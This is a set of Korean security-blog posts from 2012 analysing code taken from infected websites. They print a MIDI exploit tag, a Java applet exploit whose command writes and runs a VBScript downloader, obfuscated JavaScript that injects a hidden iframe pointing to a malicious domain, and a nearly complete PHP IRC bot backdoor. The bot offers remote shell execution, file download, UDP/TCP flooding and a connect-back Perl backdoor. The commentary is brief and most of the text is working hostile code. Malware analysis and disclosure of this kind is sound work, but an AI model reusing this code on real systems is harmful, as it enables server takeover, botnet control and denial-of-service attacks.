posted by Kwan's 2012. 2. 25. 19:17

감염 사이트 : http://ad.tiad.co.kr/mt2.html
* 위 사이트는 현재도 감염중에 있습니다! 



메인 사이트 : http://ad.tiad.co.kr/mt2.htm0


Down.html MID 취약점 스크립트 !

<body>

<object ID="audio" WIDTH=1 HEIGHT=1 CLASSID="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95">

<param name="fileName" value="test_case.mid">

<param name="SendPlayStateChangeEvents" value="true">

<param NAME="AutoStart" value="True">

<param name="uiMode" value="mini">

<param name="Volume" value="-300">

</object>

</body>

</html>

 


눈의 띄는것은 004.exe 중 Fucknaver.com 이라는게 제일 눈에 띄었다 !

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)  http://fucknaver/    > nul   /c  del    \cmd.exe    }   -   wuapi.exe   stubpath    %SystemRoot%\system32\wuapi.exe onents  ve Setup\Installed Comp \Microsoft\Acti Software    " /f        reg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\     reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\    \wuapi.exe  Version SOFTWARE\Microsoft\Ole  .exe    http://www.naver.com/    -start start   http://japanddrk/   wininet.dll ADVAPI32.dll    RegSetValueExA  RegCloseKey RegQueryValueExA    InternetOpenA   InternetOpenUrlA    InternetCloseHandle HttpQueryInfoA  RegOpenKeyExA   RegDeleteKeyA   RegCreateKeyA   kernel32.dll    WinExec 

 
Applet.jar

.project , ScriptEngineExp.class , .classpath , MANIFEST.MF 파일이 포함되어 있다 !

그중 ScriptEngineExp.class 속에 !

 ScriptEngineExp.java javax/script/ScriptEngineManagerjs A Bdata C Djava/lang/StringBuilder Pvar error = new Error("My error");this.toString = function(){ java.lang.System.setSecurityManager(null);java.lang.Runtime.getRuntime().exec('cmd.exe /c echo URL = LCase(WScript.Arguments(0))>"%temp%\\happy.vbs"&&cmd.exe /c echo dim m,s>>"%temp%\\happy.vbs"&&cmd.exe /c echo m="M^i^c^r^o^s^o^f^t^.^X^M^L^H^T^T^P">>"%temp%\\happy.vbs"&&cmd.exe /c echo s="A=D=O=DB=.=S=t=r=e=a=m">>"%temp%\\happy.vbs"&&cmd.exe /c echo set cmd =Createobject(replace(m,"^","")) >>"%temp%\\happy.vbs"&&cmd.exe /c echo cmd.Open "GET",URL,0 >>"%temp%\\happy.vbs"&&cmd.exe /c echo cmd.Send()>>"%temp%\\happy.vbs"&&cmd.exe /c echo FileName=LCase(WScript.Arguments(1))>>"%temp%\\happy.vbs"&&cmd.exe /c echo Set CsCriptGet = Createobject(replace(s,"=",""))>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Mode=^3>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Type=^1>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Open()>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Write(cmd.responseBody)>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.SaveToFile FileName,^2>>"%temp%\\happy.vbs"&&cmd.exe /c cscript "%temp%\\happy.vbs"  E F+ "%temp%\\temp.exe"&& "%temp%\\temp.exe"');return "exploit!";};error.message = this; G H I J Kjavax/swing/JListjava/lang/Objecterror L K M N Ojavax/script/ScriptException P ScriptEngineExpjava/applet/AppletgetEngineByName/(Ljava/lang/String;)
Ljavax/script/ScriptEngine;getParameter&(Ljava/lang/String;)Ljava/lang/String;append-(Ljava/lang/String;)Ljava/lang/StringBuilder;toString()
Ljava/lang/String;javax/script/ScriptEngineeval&(Ljava/lang/String;)Ljava/lang/Object;get([Ljava/lang/Object;)Vadd*(Ljava/awt/Component;)Ljava/awt/Component;printStackTrace

 

댓글을 달아 주세요

posted by Kwan's 2012. 2. 10. 20:55
감염 사이트 : http://www.imslow.kr/ghost/index.html
* 악성 링크이니 조심하시기 바랍니다!


<script language="javascript">
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('143(58(46,41,40,45,43,44){43=58(40){65(40<41?\'\':43(153(40/41)))+((40=40%41)>35?92.166(40+29):40.169(36))};91(!\'\'.90(/^/,92)){93(40--){44[43(40)]=45[40]||43(40)}45=[58(43){65 44[43]}];43=58(){65\'\\\\57+\'};40=1};93(40--){91(45[40]){46=46.90(159 161(\'\\\\42\'+43(40)+\'\\\\42\',\'48\'),45[40])}}65 46}(\'133.98(88(88
생략


</script>
<script language="javascript">
window.onerror=function(){ return true; }
</script>
<script language="JavaScript">
function decrypt(x){
       y="";
    for(i=0; i<x.length; i++){
    y += String.fromCharCode(x.charCodeAt(i)-3);
    }
    r="";
    for(i=y.length-1;i>=0;i--){
    r += y.substr(i,1);
    }
    return r;
}
mm = new Function(decrypt(unescape("%3E%2C%2C%2C%2C%25D38585%28H68585%28wslufv2F68585%28D38585%28G%3A8585%28E%3A8585%28%3C58585%28h%3B58585%28kfwdfG%3A8585%28%3C58585%28558585%2899%3B%3A%3B679%3A555%3A35713%3B3%3C%3C89584%3B9748%3B6136%3C7%3C%3A69%3C6%3A77%3A5%3B91385%3A%3B%3A596%3A373%3B34%3A138%3C5%3B5%3C37%3A%3B9%3A55%3B813558585%28%3B58585%28hwluz1%7Cgre1wqhpxfrgE%3A8585%28%7CuwD38585%28H68585%28558585%28wslufVdydM558585%28G68585%28hjdxjqdo358585%28wslufvF68585%28D38585%28H68585%28wslufv2F68585%28D38585%28G%3A8585%28E%3A8585%28%3C58585%28h%3B58585%28kfwdfG%3A8585%28%3C58585%28558585%28%3B%3A%
생략
3A8%3C613558585%28%3B58585%28hwluz1%7Cgre1wqhpxfrgE%3A8585%28%7CuwD38585%28H68585%28558585%28wslufVdydM558585%28G68585%28hjdxjqdo358585%28wslufvF68585%28%25+hsdfvhqx+hsdfvhqx+hsdfvhqx+hwluz1wqhpxfrg")));
mm();

각각의 출력이 다르다 !

1.

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1x.N(1e(1e
(생략)

2.

document.write(unescape(unescape("%253CHTML%253E%250D%250A%253CHEAD%253E%250D%250A%253CTITLE%253EHello%2520World%2520%253A%2529%2520Do%2520u%2520want%2520to%2520see%2520ghost%253F%2520%2528contact@imslow.kr%2529%253C/TITLE%253E%250D%250A%253CSCRIPT%2520language%253D%2522JavaScript%2522%253E%250D%250A%253C%
생략)));

두 함수 모두 결국은
 

<HTML>
<HEAD>
<TITLE>Hello World :) Do u want to see ghost? (contact@imslow.kr)</TITLE>
<SCRIPT language="JavaScript">
<!--
// try to maximize!
function maximizeWindow()
{
 try {
  top.window.moveTo(0,0);
  if (document.all) {
   top.window.resizeTo(screen.availWidth,screen.availHeight);
  }
  else if (document.layers||document.getElementById) {
   if (top.window.outerHeight<screen.availHeight||top.window.outerWidth<screen.availWidth){
    top.window.outerHeight = screen.availHeight;
    top.window.outerWidth = screen.availWidth;
   }
  }
 } catch(e) { }
}
maximizeWindow();

function eventIgnored()
{
 try {
  if(event) {
   event.cancelBubble = true;
   event.returnValue = false;
  }
 } catch(e)
 { }
 return false;
}

function open_window()
{
 try {
  window.open(self.location, "_blank", "resizable=no,fullscreen=yes,toolbar=no,menubar=no,status=no,titlebar=no,loca
tion=no,directories=no");
 } catch(e) { }
}

function try_open()
{
 try {
  open_window();
  setTimeout(try_open, 2000);
 } catch(e) { }
}

function set_DisableRight()
{
 try {
  document.oncontextmenu = eventIgnored;
  document.ondragstart = eventIgnored;
  document.onselectstart = eventIgnored;
  setTimeout(set_DisableRight, 100);
 } catch(e)
 { }
}

function fm() {
 var s = "";
 s += '<object type="application/x-shockwave-flash" ';
 s += 'classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" ';
 s += 'codebase="
http://fpdownload.macromedia.com
 s += 'pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0"';
 s += 'id="ghostmovie" width="100%" height="100%">';
 s += '<param name="movie" value="ghost.swf">';
 s += '<param name="quality" value="high">'; 
 s += '<param name="menu" value="false">';
 s += '<param name="swliveconnect" value="true">';
 s += '<param name="scale" value="exactFit">';
 s += '<embed src="ghost.swf" quality="high" menu="false" ';
 s += 'width="100%" height="100%" swliveconnect="true" scale="exactFit" ';
 s += 'id="ghostmovie" name="ghostmovie" type="application/x-shockwave-flash" ';
 s += 'pluginspage="http://www.macromedia.com/go/getflashplayer"><\/embed>';
 s += '<\/object>';
 document.write(s);
}
setTimeout(try_open, 2000);
setTimeout(set_DisableRight, 100);
// -->
</SCRIPT>
</HEAD>
<BODY bgcolor=white onload="document.bgColor='black'" onunload="open_window();open_window();alert('Gotcha!\tHey man :)');" onmousedown="if(event.button==2){alert("Gotcha!");}" leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 oncontextmenu="return false" ondragstart="return false" onselectstart="return false" unselectable="on" style="cursor: default;">
<SCRIPT language="JavaScript">
 fm();
</SCRIPT>
</BODY>
</HTML>

clsid:d27cdb6e-ae6d-11cf-96b8-444553540000

clsid:d27cdb6e-ae6d-11cf-96b8-444553540000

{D27CDB6E-AE6D-11CF-96B8-444553540000}

Updated: March 28, 2003

Applies To: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\AllowedControls

Description

Stores configuration data for the policy setting Shockwave Flash.

Change Method

To change the value of this entry, use the Group Policy Object Editor (Gpedit.msc). The corresponding policy is located in \Windows Components\Internet Explorer\Administrator Approved Controls.

댓글을 달아 주세요

  1. 벌새 2012.02.10 21:21 신고  Addr  Edit/Del  Reply

    한 마디로 flash 취약점이군요.

    • Kwan's 2012.02.11 12:24 신고  Addr  Edit/Del

      너무 글이 길었나봐요 ㅠㅠㅠㅠ
      그냥 딱 한마디로 정리할껄 그랬어요 ㅠㅠㅠㅠ

  2. ray 2012.02.12 22:59  Addr  Edit/Del  Reply

    ghost.swf 파일의 내용은 무엇인지요~?

posted by Kwan's 2012. 1. 29. 14:59

메인 스크립트중 ! 이상한 스크립트 발견 !

function c102916999516m494180f401f90(m494180f40275f){ var m494180f402f30=16; return (parseInt(m494180f40275f,m494180f402f30));}function m494180f403ed1(m494180f4046a2){ function m494180f405e13(){return 2;} var m494180f404e72='';m494180f406db4=String.fromCharCode;for(m494180f405643=0;m494180f405643<m494180f4046a2.length;m494180f405643+=m494180f405e13()){ m494180f404e72+=(m494180f406db4(c102916999516m494180f401f90(m494180f4046a2.substr(m494180f405643,m494180f405e13()))));}return m494180f404e72;} var z0f='';var m494180f407587='3C7'+z0f+'3637'+z0f+'2697'+z0f+'07'+z0f+'43E696628216D7'+z0f+'
[생략]'
34253638253364253334253337'+z0f+'253330253230253638253635253639253637'+z0f+'2536382537'
+z0f+'34253364253334253334253337'+z0f+'2532302537'+z0f+'332537'+z0f+'342537'+z0f+'3925366
3253635253364253237'+z0f+'2536342536392537'+z0f+'332537'+z0f+'302536632536312537'+z0f+'39
253361253230253665253666253665253635253237'+z0f+'2533652533632532662536392536362537'+z
0f+'3225363125366425363525336527'+z0f+'29293B7'+z0f+'D7'+z0f+'6617'+z0f+'2206D7'+z0f+'
969613D7'+z0f+'47'+z0f+'27'+z0f+'5653B3C2F7'+z0f+'3637'+z0f+'2697'+z0f+'07'+z0f+'43E';
document.write(m494180f403ed1(m494180f407587));

<script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f[생략]69%67%68%74%3d%31%31%35%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>

if(!myia){document.write(unescape( '<iframe name=c10 src='http://gogo2me.net/.go/check.html?'+Math.round(Math.random()*49335)+'c3d' width=429 height=115 style='display: none'></iframe>'));}var myia=true;

현재 페이지는 !


=========================
Server IP(s):
0.0.0.0
=========================
HTTP headers:

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 29 Jan 2012 05:56:49 GMT
Connection: close
Content-Length: 1245

댓글을 달아 주세요

posted by Kwan's 2012. 1. 23. 23:35

File : input.jpg
MD5 : 7e3a6b9991f49fafe5e3b9c0ef8c8d1b
크기 : 5.93KB (6,079 바이트)
감염 사이트 : http://www.mhouse.or.kr//bbs/admin/input.jxg
Kaspersky : Backdoor.PHP.Pbot.bl
VirusTotal : 바이러스토탈결과


<?
set_time_limit(0);
error_reporting(0);
echo "ok!";

$code = "7Txpc9rItp/9qt5/aOtSY5QQLMB4xjj2HUywLTvGMRi8xBQlpAY
+9R+BRGne7l7V+FwMMsQR0nDUcoLleLavXH0vi2wvVp9/FE25z0AD5kk
/k8bbauLirNkRXXmAr7dyJ2ia9W0g8ob9oiV/2BnWhUWv0GzWR9Kc2/Xh3
1cVjefgAdH7MVfSLnNC9GGfIwz08j4sO2JN8VRK7uFQUPPwqPlOFyw/F
ZXyXH+6r4I89oPrZce3/6IibvmIPwYyhRcMsvfiX5OjSHedfQ5zeEKPN6HpeC[생략]
z8Ty7bcZrsKfZUozZm/wdxFJVo/XB5Y+mPDkjskBVqwTZhpahOI9W3Jwvt7
LQXL9EzHLFoFjhVPz99xBjZVNIPK7mixcId+C0CPJNAbDWYJeojtRdkMJTOu
fLymkTKaq1sip3CrTcoqBHmVvOaJDclsQUTpGLKJEMmLkti4AOLwHcku+4
J/JmwZJkGvmhwhDY/YC3jp+E6LZms+/wc=";

@eval(gzinflate(base64_decode($code)));

eval gzinflate base64_decode Online Decode Tool

 class pBot
 {
   var $config = array("server"=>"irc.plasa.com",  // ip/host da rede                     "port"=>"6667",   // porta da rede                     "pass"=>"**",   // senha da rede                     "prefix"=>"Justice",   // nick do bot                     "maxrand"=>"5",   // quantidade de numero no nick do bot                     "chan"=>"#007",   // canal que os bots vao entrar                     "chan2"=>"#007",  // canal aonde os bots v?o mandar as vulns ao conectar (-n)                     "key"=>"rakitan",      // senha do canal                     "modes"=>"+p",              // modos do bot                     "password"=>"**",           // senha pra acesso (.user SENHA)                     "trigger"=>".",   // prefico dos comandos                     "hostauth"=>"Experience.Is.The.Best.Teacher"   // host dos owners (* for any hostname)                     );
   var $users = array();
   function start()
   {
     if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))        $this->start();
     $ident = $this->config['prefix'];
     $alph = range("0","9");
     for($i=0;$i<$this->config['maxrand'];$i++)        $ident .= $alph[rand(0,9)];
     if(strlen($this->config['pass'])>0)        $this->send("PASS ".$this->config['pass']);
     $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
     $this->set_nick();
     $this->main();
   }
   function main()
   {
     while(!feof($this->conn))
     {
       $this->buf = trim(fgets($this->conn,512));
       $cmd = explode(" ",$this->buf);
       if(substr($this->buf,0,6)=="PING :")
       {
         $this->send("PONG :".substr($this->buf,6));
       }
       if(isset($cmd[1]) && $cmd[1] =="001")
       {
         $this->send("MODE ".$this->nick." ".$this->config['modes']);
         $this->join($this->config['chan'],$this->config['key']);
         if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
         {
           $safemode = "ON";
         }
         else
         {
           $safemode = "OFF";
         }
         $uname = php_uname();
         $this->privmsg($this->config['chan2'],"uname: $uname (Safe: $safemode)");
         $this->privmsg($this->config['chan2'],"Vuln :
http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI'."");
       }
       if(isset($cmd[1]) && $cmd[1]=="433")
       {
         $this->set_nick();
       }
       if($this->buf != $old_buf)
       {
         $mcmd = array();
         $msg = substr(strstr($this->buf," :"),2);
         $msgcmd = explode(" ",$msg);
         $nick = explode("!",$cmd[0]);
         $vhost = explode("@",$nick[1]);
         $vhost = $vhost[1];
         $nick = substr($nick[0],1);
         $host = $cmd[0];
         if($msgcmd[0]==$this->nick)
         {
           for($i=0;$i<count($msgcmd);
           $i++)               $mcmd[$i] = $msgcmd[$i+1];
         }
         else
         {
           for($i=0;$i<count($msgcmd);
           $i++)               $mcmd[$i] = $msgcmd[$i];
         }
         if(count($cmd)>2)
         {
           switch($cmd[1])
           {
             case "QUIT":                    if($this->is_logged_in($host))
             {
               $this->log_out($host);
             }
             break;
             case "PART":                    if($this->is_logged_in($host))
             {
               $this->log_out($host);
             }
             break;
             case "PRIVMSG":                    if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
             {
               if(substr($mcmd[0],0,1)==".")
               {
                 switch(substr($mcmd[0],1))
                 {
                   case "masuk":                               if($mcmd[1]==$this->config['password'])
                   {
                     $this->log_in($host);
                   }
                   else
                   {
                     $this->notice($this->config['chan'],"[\2Auth\2]: Tahede Ngana $nick GOBLOK!!");
                   }
                   break;
                 }
               }
             }
             elseif($this->is_logged_in($host))
             {
               if(substr($mcmd[0],0,1)==".")
               {
                 switch(substr($mcmd[0],1))
                 {
                   case "restart":                                $this->send("QUIT :restart commando from $nick");
                   fclose($this->conn);
                   $this->start();
                   break;
                   case "mail": //mail to from subject message                                if(count($mcmd)>4)
                   {
                     $header = "From: <".$mcmd[2].">";
                     if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
                     {
                       $this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
                     }
                     else
                     {
                       $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
                     }
                   }
                   break;
                   case "safe":                               if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
                   {
                     $safemode = "on";
                   }
                   else
                   {
                     $safemode = "off";
                   }
                   $this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
                   break;
                   case "inbox": //teste inbox                               if(isset($mcmd[1]))
                   {
                     $token = md5(uniqid(rand(), true));
                     $header = "From: <inbox".$token."@xdevil.org>";
                     $a = php_uname();
                     $b = getenv("SERVER_SOFTWARE");
                     $c = gethostbyname($_SERVER["HTTP_HOST"]);
                     if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln:
http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
                     {
                       $this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
                     }
                     else
                     {
                       $this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
                     }
                   }
                   break;
                   case "conback":                               if(count($mcmd)>2)
                   {
                     $this->conback($mcmd[1],$mcmd[2]);
                   }
                   break;
                   case "dns":                                if(isset($mcmd[1]))
                   {
                     $ip = explode(".",$mcmd[1]);
                     if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
                     {
                       $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
                     }
                     else
                     {
                       $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
                     }
                   }
                   break;
                   case "info":                            case "vunl":                               if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
                   {
                     $safemode = "on";
                   }
                   else
                   {
                     $safemode = "off";
                   }
                   $uname = php_uname();
                   $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
                   $this->privmsg($this->config['chan'],"[\2vuln\2]:
http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
                   break;
                   case "bot":                               $this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; prekelz");
                   break;
                   case "uname":                               if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
                   {
                     $safemode = "on";
                   }
                   else
                   {
                     $safemode = "off";
                   }
                   $uname = php_uname();
                   $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
                   break;
                   case "rndnick":                                $this->set_nick();
                   break;
                   case "raw":                               $this->send(strstr($msg,$mcmd[1]));
                   break;
                   case "eval":                              $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
                   break;
                   case "sexec":                               $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                   $exec = shell_exec($command);
                   $ret = explode("\n",$exec);
                   for($i=0;$i<count($ret);
                   $i++)                                   if($ret[$i]!=NULL)                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
                   break;
                   case "exec":                                $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                   $exec = exec($command);
                   $ret = explode("\n",$exec);
                   for($i=0;$i<count($ret);
                   $i++)                                   if($ret[$i]!=NULL)                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
                   break;
                   case "passthru":                                $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                   $exec = passthru($command);
                   $ret = explode("\n",$exec);
                   for($i=0;$i<count($ret);
                   $i++)                                   if($ret[$i]!=NULL)                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
                   break;
                   case "popen":                                if(isset($mcmd[1]))
                   {
                     $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                     $this->privmsg($this->config['chan'],"[\2popen\2]: $command");
                     $pipe = popen($command,"r");
                     while(!feof($pipe))
                     {
                       $pbuf = trim(fgets($pipe,512));
                       if($pbuf != NULL)                                         $this->privmsg($this->config['chan'],"     : $pbuf");
                     }
                     pclose($pipe);
                   }
                   case "system":                                $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                   $exec = system($command);
                   $ret = explode("\n",$exec);
                   for($i=0;$i<count($ret);
                   $i++)                                   if($ret[$i]!=NULL)                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
                   break;
                   case "pscan": // .pscan 127.0.0.1 6667                                if(count($mcmd) > 2)
                   {
                     if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))                                      $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
                     else                                      $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
                   }
                   break;
                   case "ud.server": // .ud.server <server> <port> [password]                                if(count($mcmd)>2)
                   {
                     $this->config['server'] = $mcmd[1];
                     $this->config['port'] = $mcmd[2];
                     if(isset($mcmcd[3]))
                     {
                       $this->config['pass'] = $mcmd[3];
                       $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
                     }
                     else
                     {
                       $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
                     }
                   }
                   break;
                   case "download":                                if(count($mcmd) > 2)
                   {
                     if(!$fp = fopen($mcmd[2],"w"))
                     {
                       $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
                     }
                     else
                     {
                       if(!$get = file($mcmd[1]))
                       {
                         $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
                       }
                       else
                       {
                         for($i=0;$i<=count($get);
                         $i++)
                         {
                           fwrite($fp,$get[$i]);
                         }
                         $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
                       }
                       fclose($fp);
                     }
                   }
                   else
                   {
                     $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file");
                   }
                   break;
                   case "mati":                                $this->send("QUIT :die command from $nick");
                   fclose($this->conn);
                   exit;
                   case "keluar":                                $this->log_out($host);
                   $this->privmsg($this->config['chan'],"[\2auth\2]: $nick ekhuuuuuuuu!");
                   break;
                   case "fluud":                                if(count($mcmd)>3)
                   {
                     $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
                   }
                   break;
                   case "flood":                                if(count($mcmd)>5)
                   {
                     $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
                   }
                   break;
                 }
               }
             }
             break;
           }
         }
       }
       $old_buf = $this->buf;
     }
     $this->start();
   }
   function send($msg)
   {
     fwrite($this->conn,"$msg\r\n");
   }
   function join($chan,$key=NULL)
   {
     $this->send("JOIN $chan $key");
   }
   function privmsg($to,$msg)
   {
     $this->send("PRIVMSG $to :$msg");
   }
   function notice($to,$msg)
   {
     $this->send("NOTICE $to :$msg");
   }
   function is_logged_in($host)
   {
     if(isset($this->users[$host]))        return 1;
     else        return 0;
   }
   function log_in($host)
   {
     $this->users[$host] = true;
   }
   function log_out($host)
   {
     unset($this->users[$host]);
   }
   function set_nick()
   {
     if(isset($_SERVER['SERVER_SOFTWARE']))
     {
       if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))           $this->nick = "";
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))           $this->nick = "I";
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))           $this->nick = "";
       else           $this->nick = "";
     }
     else
     {
       $this->nick = "";
     }
     $this->nick .= $this->config['prefix'];
     for($i=0;$i<$this->config['maxrand'];$i++)        $this->nick .= mt_rand(0,9);
     $this->send("NICK ".$this->nick);
   }
   function udpflood($host,$packetsize,$time)
   {
     $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
     $packet = "";
     for($i=0;$i<$packetsize;$i++)
     {
       $packet .= chr(mt_rand(1,256));
     }
     $timei = time();
     $i = 0;
     while(time()-$timei < $time)
     {
       $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
       fwrite($fp,$packet);
       fclose($fp);
       $i++;
     }
     $env = $i * $packetsize;
     $env = $env / 1048576;
     $vel = $env / $time;
     $vel = round($vel);
     $env = round($env);
     $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
   }
   function tcpflood($host,$packets,$packetsize,$port,$delay)
   {
     $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
     $packet = "";
     for($i=0;$i<$packetsize;$i++)        $packet .= chr(mt_rand(1,256));
     for($i=0;$i<$packets;$i++)
     {
       if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
       {
         $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
         return 0;
       }
       else
       {
         fwrite($fp,$packet);
         fclose($fp);
       }
       sleep($delay);
     }
     $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
   }
   function conback($ip,$port)
   {
     $this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
     $dc_source = "
IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRh
dGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkd
WWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQo
gIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iO
w
[생략] PiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZW
lsqXSBEYXRhY2hlZFxuXG4iOw==";
     if (is_writable("/tmp"))
     {
       if (file_exists("/tmp/dc.pl"))
       {
         unlink("/tmp/dc.pl");
       }
       $fp=fopen("/tmp/dc.pl","w");
       fwrite($fp,base64_decode($dc_source));
       passthru("perl /tmp/dc.pl $ip $port &");
       unlink("/tmp/dc.pl");
     }
     else
     {
       if (is_writable("/var/tmp"))
       {
         if (file_exists("/var/tmp/dc.pl"))
         {
           unlink("/var/tmp/dc.pl");
         }
         $fp=fopen("/var/tmp/dc.pl","w");
         fwrite($fp,base64_decode($dc_source));
         passthru("perl /var/tmp/dc.pl $ip $port &");
         unlink("/var/tmp/dc.pl");
       }
       if (is_writable("."))
       {
         if (file_exists("dc.pl"))
         {
           unlink("dc.pl");
         }
         $fp=fopen("dc.pl","w");
         fwrite($fp,base64_decode($dc_source));
         passthru("perl dc.pl $ip $port &");
         unlink("dc.pl");
       }
     }
   }
 }
 $bot = new pBot;
 $bot->start();
 

#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}

일부 코드 생략 !!

}
print "[*] Datached\n\n";

Decode 결과물.zip


Decode : 바이러스토탈결과

* 결과물에는 암호가 설정 되어 있습니다.                                                (비밀댓글 주시면 암호 알려드리겠습니다.)

댓글을 달아 주세요

  1. 2012.05.08 14:02  Addr  Edit/Del  Reply

    비밀댓글입니다

  2. 2014.11.04 17:45  Addr  Edit/Del  Reply

    비밀댓글입니다

